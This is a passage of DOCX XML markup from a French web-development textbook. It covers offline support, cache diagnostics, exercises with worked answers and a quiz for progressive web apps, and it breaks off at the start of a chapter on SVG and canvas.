          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le hors-ligne ne consiste pas à afficher une page d'erreur : il faut prévoir ce que l'utilisateur peut encore faire, et synchroniser son travail au retour du réseau.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une file d'attente hors-ligne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File d'attente des écritures, rejouées au retour du réseau</w:t>
        <w:br/>
        <w:t>const FILE = "file-attente";</w:t>
        <w:br/>
        <w:br/>
        <w:t>async function enregistrerEcriture(requete) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const corps = await requete.clone().json();</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const file = await lireFile();</w:t>
        <w:br/>
        <w:t>file.push({ url: requete.url, methode: requete.method, corps, date: Date.now()</w:t>
        <w:br/>
        <w:t xml:space="preserve">    });</w:t>
        <w:br/>
        <w:t xml:space="preserve">  await ecrireFile(file);</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>self.addEventListener("sync", (evenement) =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  if (evenement.tag === "synchroniser-ecritures") {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    evenement.waitUntil(rejouerFile());</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t>});</w:t>
        <w:br/>
        <w:br/>
        <w:t>async function rejouerFile() {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const file = await lireFile();</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const restantes = [];</w:t>
        <w:br/>
        <w:t xml:space="preserve">  for (const item of file) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    try {</w:t>
        <w:br/>
        <w:t xml:space="preserve">      await fetch(item.url, {</w:t>
        <w:br/>
        <w:t xml:space="preserve">        method: item.methode,</w:t>
        <w:br/>
        <w:t xml:space="preserve">        headers: { "Content-Type": "application/json" },</w:t>
        <w:br/>
        <w:t xml:space="preserve">        body: JSON.stringify(item.corps),</w:t>
        <w:br/>
        <w:t xml:space="preserve">      });</w:t>
        <w:br/>
        <w:t xml:space="preserve">    } catch {</w:t>
        <w:br/>
        <w:t xml:space="preserve">      restantes.push(item);</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t xml:space="preserve">  await ecrireFile(restantes);</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.137 — Quatre fonctions et leurs replis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9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Fonction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="29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Disponibilité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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Repli</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2962"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Consulter des fiches</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Partout</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3091"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Cache</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Créer une recette</w:t>
            </w:r>
          </w:p>
        </w:tc>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Hors-ligne</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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File d'attente</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2962"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Rechercher</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En ligne</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3091"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Message explicite</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Synchroniser</w:t>
            </w:r>
          </w:p>
        </w:tc>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Au retour du réseau</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Rejeu automatique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SYNCHRONISATION EN ARRIÈRE-PLAN</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>API permettant de rejouer une requête différée lorsque le réseau revient, même si la page est fermée. Le support varie selon les navigateurs.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>41.6 Diagnostiquer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les problèmes de PWA viennent presque toujours du cache. Les outils de développement permettent de voir la version active, de la désinstaller et de simuler le hors-ligne.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.138 — Cinq symptômes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Symptôme</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="313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Cause probable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="287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Vérification</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Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Version ancienne servie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3135"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Cache non invalidé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2874"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Application → Cache storage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Aucune installation proposée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="313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Manifeste ou icônes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="287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Onglet Manifest</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Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Hors-ligne indisponible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3135"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Ressources non mises en cache</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2874"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Onglet Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Mise à jour invisible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="313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Nouveau worker en attente</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="287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skipWaiting</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Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Erreur au chargement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3135"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Chemin absolu incorrect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2874"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Scope du worker</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux réflexes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Vérifier ce qui est réellement servi</w:t>
        <w:br/>
        <w:t>curl -sI https://exemple.fr/ | grep -i "cache-control\|etag"</w:t>
        <w:br/>
        <w:br/>
        <w:t># Versionner le cache à chaque livraison</w:t>
        <w:br/>
        <w:t># Le nom du cache change : les anciens sont supprimés à l'activation</w:t>
        <w:br/>
        <w:t>const CACHE = `carnet-${VERSION}`;</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CHECKLIST PWA</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HTTPS partout, y compris la préproduction.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Manifeste valide, icônes 192 et 512, une maskable.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Cache nommé par version, anciens supprimés.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Réseau d'abord pour les pages, cache d'abord pour les statiques.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Jamais de cache sur les réponses authentifiées.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Bandeau de mise à jour testé.</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PWA combine HTTPS, manifeste et service worker.</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service worker vit après la fermeture de l'onglet.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cycle installé → en attente → actif évite de casser une session.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Chaque type de ressource appelle sa propre stratégie de cache.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réponses personnalisées ne se mettent pas en cache.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hors-ligne utile prévoit une file d'attente des écritures.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version de cache se nomme et se nettoie.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outils du navigateur montrent le worker actif et les caches.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>L'application fonctionne hors-ligne. Le chapitre suivant explore le dessin vectoriel et les graphiques dans la page.</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41.1 — Écrire un manifeste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L'application doit être installable sur mobile.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Déclarez nom et icônes.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Choisissez le mode d'affichage.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Ajoutez un raccourci.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 41.2 — Mettre en place le hors-ligne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Les fiches consultées doivent rester lisibles sans réseau.</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Mettez en cache les ressources.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Servez depuis le cache en cas d'échec.</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Affichez un message clair.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 41.3 — Diagnostiquer un cache figé</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Les utilisateurs voient une version vieille de trois semaines.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Vérifiez le nom du cache.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Inspectez le cycle de vie.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Corrigez la stratégie.</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41.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>{</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "name": "Carnet de recettes",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "short_name": "Carnet",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "start_url": "/",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "scope": "/",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "display": "standalone",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "background_color": "#FBF3E2",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "theme_color": "#0F2E4C",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "icons": [</w:t>
        <w:br/>
        <w:t xml:space="preserve">    { "src": "/icones/192.png", "sizes": "192x192", "type": "image/png" },</w:t>
        <w:br/>
        <w:t xml:space="preserve">    { "src": "/icones/512.png", "sizes": "512x512", "type": "image/png" },</w:t>
        <w:br/>
        <w:t xml:space="preserve">    { "src": "/icones/masque.png", "sizes": "512x512", "type": "image/png",</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "purpose": "maskable" }</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ]</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>start_url</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> doit être dans le périmètre du service worker pour que l'installation soit proposée.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>L'icône maskable évite que le système rogne les coins de votre logo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 41.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>self.addEventListener("fetch", (e) =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  if (e.request.mode !== "navigate") return;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  e.respondWith((async () =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    try {</w:t>
        <w:br/>
        <w:t xml:space="preserve">      const r = await fetch(e.request);</w:t>
        <w:br/>
        <w:t xml:space="preserve">      const c = await caches.open(CACHE);</w:t>
        <w:br/>
        <w:t xml:space="preserve">      c.put(e.request, r.clone());</w:t>
        <w:br/>
        <w:t xml:space="preserve">      return r;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    } catch {</w:t>
        <w:br/>
        <w:t xml:space="preserve">      const c = await caches.open(CACHE);</w:t>
        <w:br/>
        <w:t xml:space="preserve">      return (await c.match(e.request)) ?? c.match("/hors-ligne.html");</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:t xml:space="preserve">  })());</w:t>
        <w:br/>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Ne traiter que </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>mode === "navigate"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> évite d'interférer avec les appels d'API.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La page de secours doit elle-même être mise en cache à l'installation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 41.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>// Cause : cache constant + stratégie « cache d'abord » sur le HTML</w:t>
        <w:br/>
        <w:t>const CACHE = "carnet";           // jamais changé</w:t>
        <w:br/>
        <w:br/>
        <w:t>// Correction 1 : nommer le cache par version</w:t>
        <w:br/>
        <w:t xml:space="preserve">const CACHE = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>carnet-${VERSION}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
        <w:br/>
        <w:br/>
        <w:t>// Correction 2 : réseau d'abord pour les navigations</w:t>
        <w:br/>
        <w:t>// Correction 3 : activation qui supprime les anciens caches</w:t>
        <w:br/>
        <w:t>self.addEventListener("activate", (e) =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  e.waitUntil(caches.keys().then((noms) =&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    Promise.all(noms.filter((n) =&gt; n !== CACHE).map((n) =&gt; caches.delete(n)))));</w:t>
        <w:br/>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un cache au nom fixe ne se distingue jamais de la version précédente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le HTML doit être réseau d'abord : sinon une correction de contenu ne peut jamais atteindre les utilisateurs.</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Quelle condition est indispensable à une PWA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 framework</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HTTPS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Un compte utilisateur</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Un serveur Node</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 xml:space="preserve">Que fait </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>skipWaiting</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Active immédiatement le nouveau worker</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Supprime le cache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Ferme les onglets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Installe le manifeste</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Quelle stratégie pour des polices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Réseau d'abord</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Cache d'abord</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Réseau seul</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Aucune</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 xml:space="preserve">Pourquoi ne pas cacher </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/api/</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Trop volumineux</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Réponses personnalisées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Trop lent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Non compressé</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 se passe-t-il si le manifeste manque d'icônes 192 et 512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Rien</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L'installation peut être refusée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 site ne charge plus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 cache est vidé</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Sans HTTPS, ni service worker ni installation.</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Il faut l'utiliser en connaissance de cause, après accord de l'utilisateur.</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Les polices changent rarement et doivent charger vite.</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Une réponse authentifiée mise en cache peut fuiter vers un autre profil.</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Les icônes font partie des critères d'installabilité.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>42. SVG, canvas et visualisation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
